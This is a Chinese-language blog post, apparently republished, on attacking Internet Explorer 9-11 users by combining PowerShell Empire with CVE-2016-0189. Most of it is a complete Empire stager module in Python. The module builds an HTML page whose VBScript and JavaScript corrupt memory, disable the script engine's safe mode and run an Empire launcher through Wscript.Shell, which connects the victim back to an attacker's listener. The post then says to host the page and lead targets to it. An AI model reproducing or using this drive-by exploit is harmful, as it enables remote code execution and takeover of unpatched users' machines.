利用Powershell Empire和CVE-2016-0189攻击用户的IE浏览器

来源:互联网 发布:索尼xz更新挂起网络 编辑:程序博客网 时间:2024/05/16 07:04



因此,Powershell Empire是我们最喜欢的一款工具,尤其是当目标用户在我们的活动范围内时。我们通常使用Metasploit和Empire的组合来完成工作,即结合浏览器漏洞利用和Empire内的标准操作进行。

不过,在最近的一个测试中,我们没有使用MSF,而是使用了Empire中的一个新stager,该stager能够利用漏洞CVE-2016-0189(也称为vbscript_godmod,是一个 IE 游览器的脚本引擎漏洞)来攻击目标用户的IE浏览器(Internet explorer 9-11)。这是近6个月以来我们的首选利用,而且最近我们已经开始开发利用工具。如果成功的话,可以在保证硬盘数据不丢失的情况下启动powershell,同时将代理连接到Empire。


利用Powershell Empire和CVE-2016-0189攻击用户的IE浏览器


from lib.common import helpers  class Stager:      def __init__(self, mainMenu, params=[]):          self.info = {            'Name': 'MS16-051 IE RCE',              'Author': ['www.cgsec.co.uk'],              'Description': ('Leverages MS16-051 to execute powershell in unpatched browsers. This is a file-less vector which works on IE9/10/11 and all versions of Windows'),              'Comments': [                'Target will have to open link with vulnerable version of IE.'            ]        }          # any options needed by the stager, settable during runtime        self.options = {            # format:            #   value_name : {description, required, default_value}            'Listener' : {                'Description'   :   'Listener to generate stager for.',                'Required'      :   True,                'Value'         :   ''            },            'StagerRetries' : {                'Description'   :   'Times for the stager to retry connecting.',                'Required'      :   False,                'Value'         :   '0'            },            'OutFile' : {                'Description'   :   'File to output HTML to, otherwise displayed on the screen.',                'Required'      :   True,                'Value'         :   ''            },            'Base64' : {                'Description'   :   'Switch. Base64 encode the powershell output.',                'Required'      :   True,                'Value'         :   'True'            },                       'UserAgent' : {                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',                'Required'      :   False,                'Value'         :   'default'            },            'Proxy' : {                'Description'   :   'Proxy to use for request (default, none, or other).',                'Required'      :   False,                'Value'         :   'default'            },            'ProxyCreds' : {                'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',                'Required'      :   False,                'Value'         :   'default'            }        }          # save off a copy of the mainMenu object to access external functionality        #   like listeners/agent handlers/etc.        self.mainMenu = mainMenu          for param in params:            # parameter format is [Name, Value]            option, value = param            if option in self.options:                self.options[option]['Value'] = value      def generate(self):          # extract all of our options        listenerName = self.options['Listener']['Value']        base64 = self.options['Base64']['Value']        userAgent = self.options['UserAgent']['Value']        proxy = self.options['Proxy']['Value']        proxyCreds = self.options['ProxyCreds']['Value']        stagerRetries = self.options['StagerRetries']['Value']          encode = False        if base64.lower() == "true":            encode = True          # generate the launcher code        launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)          if launcher == "":            print helpers.color("[!] Error in launcher command generation.")            return ""        else:                            code =  "<html>\n"                            code += "<head>\n"                            code += "<meta http-equiv=\"x-ua-compatible\" content=\"IE=10\">\n"                            code += "</head>\n"                            code += "<body>\n"                            code += "    <script type=\"text/vbscript\">\n"                            code += "        Dim aw\n"                            code += "        Dim plunge(32)\n"                            code += "        Dim y(32)\n"                            code += "        prefix = \"%u4141%u4141\"\n"                            code += "        d = prefix & \"%u0016%u4141%u4141%u4141%u4242%u4242\"\n"                            code += "        b = String(64000, \"D\")\n"                            code += "        c = d & b\n"                            code += "        x = UnEscape(c)\n"                            code += "          \n"                            code += "        Class ArrayWrapper\n"                            code += "            Dim A()\n"                            code += "            Private Sub Class_Initialize\n"                            code += "                  ReDim Preserve A(1, 2000)\n"                            code += "            End Sub\n"                            code += "                    \n"                            code += "            Public Sub Resize()\n"                            code += "                ReDim Preserve A(1, 1)\n"                            code += "            End Sub\n"                            code += "        End Class\n"                            code += "          \n"                            code += "        Class Dummy\n"                            code += "        End Class\n"                            code += "          \n"                            code += "        Function getAddr (arg1, s)\n"                            code += "            aw = Null\n"                            code += "            Set aw = New ArrayWrapper\n"                            code += "          \n"                            code += "            For i = 0 To 32\n"                            code += "                Set plunge(i) = s\n"                            code += "            Next\n"                            code += "          \n"                            code += "            Set aw.A(arg1, 2) = s\n"                            code += "          \n"                            code += "            Dim addr\n"                            code += "            Dim i\n"                            code += "            For i = 0 To 31\n"                            code += "                If Asc(Mid(y(i), 3, 1)) = VarType(s) Then\n"                            code += "                   addr = strToInt(Mid(y(i), 3 + 4, 2))\n"                            code += "                End If\n"                            code += "                y(i) = Null\n"                            code += "            Next\n"                            code += "          \n"                            code += "            If addr = Null Then\n"                            code += "                document.location.href = document.location.href\n"                            code += "                Return\n"                            code += "            End If\n"                            code += "            getAddr = addr\n"                            code += "        End Function\n"                            code += "          \n"                            code += "        Function leakMem (arg1, addr)\n"                            code += "            d = prefix & \"%u0008%u4141%u4141%u4141\"\n"                            code += "            c = d & intToStr(addr) & b\n"                            code += "            x = UnEscape(c)\n"                            code += "          \n"                            code += "            aw = Null\n"                            code += "            Set aw = New ArrayWrapper\n"                            code += "          \n"                            code += "            Dim o\n"                            code += "            o = aw.A(arg1, 2)\n"                            code += "          \n"                            code += "            leakMem = o\n"                            code += "        End Function\n"                            code += "          \n"                            code += "        Sub overwrite (arg1, addr)\n"                            code += "            d = prefix & \"%u400C%u0000%u0000%u0000\"\n"                            code += "            c = d & intToStr(addr) & b\n"                            code += "            x = UnEscape(c)\n"                            code += "          \n"                            code += "            aw = Null\n"                            code += "            Set aw = New ArrayWrapper\n"                            code += "          \n"                            code += "          \n"                            code += "            aw.A(arg1, 2) = CSng(0)\n"                            code += "        End Sub\n"                            code += "          \n"                            code += "        Function exploit (arg1)\n"                            code += "            Dim addr\n"                            code += "            Dim csession\n"                            code += "            Dim olescript\n"                            code += "            Dim mem\n"                            code += "          \n"                            code += "          \n"                            code += "            Set dm = New Dummy\n"                            code += "          \n"                            code += "            addr = getAddr(arg1, dm)\n"                            code += "          \n"                            code += "            mem = leakMem(arg1, addr + 8)\n"                            code += "            csession = strToInt(Mid(mem, 3, 2))\n"                            code += "          \n"                            code += "            mem = leakMem(arg1, csession + 4)\n"                            code += "            olescript = strToInt(Mid(mem, 1, 2))\n"                            code += "            overwrite arg1, olescript + &H174\n"                            code += "     Set Object = CreateObject(\"Wscript.Shell\")\n"                            code +=    "                 Object.run(\""                            code +=            launcher +       "\")\n"                            code += "        End Function\n"                            code += "          \n"                            code += "        Function triggerBug\n"                            code += "            aw.Resize()\n"                            code += "            Dim i\n"                            code += "            For i = 0 To 32\n"                            code += "                ' 24000x2 + 6 = 48006 bytes\n"                            code += "                y(i) = Mid(x, 1, 24000)\n"                            code += "            Next\n"                            code += "        End Function\n"                            code += "    </script>\n"                            code += "          \n"                            code += "    <script type=\"text/javascript\">\n"                            code += "        function strToInt(s)\n"                            code += "        {\n"                            code += "            return s.charCodeAt(0) | (s.charCodeAt(1) << 16);\n"                            code += "        }\n"                            code += "        function intToStr(x)\n"                            code += "        {\n"                            code += "            return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);\n"                            code += "        }\n"                            code += "        var o;\n"                            code += "        o = {\"valueOf\": function () {\n"                            code += "                triggerBug();\n"                            code += "                return 1;\n"                            code += "            }};\n"                            code += "        setTimeout(function() {exploit(o);}, 50);\n"                            code += "    </script>\n"                            code += "</body>\n"                            code += "</html>"           return code








如果一切正常的话,我们应该能够使用“stager ms16”。本文只是简单地将输出文件设置到/var/www/html/index.html,然后引导目标到该html页面,如下图所示。







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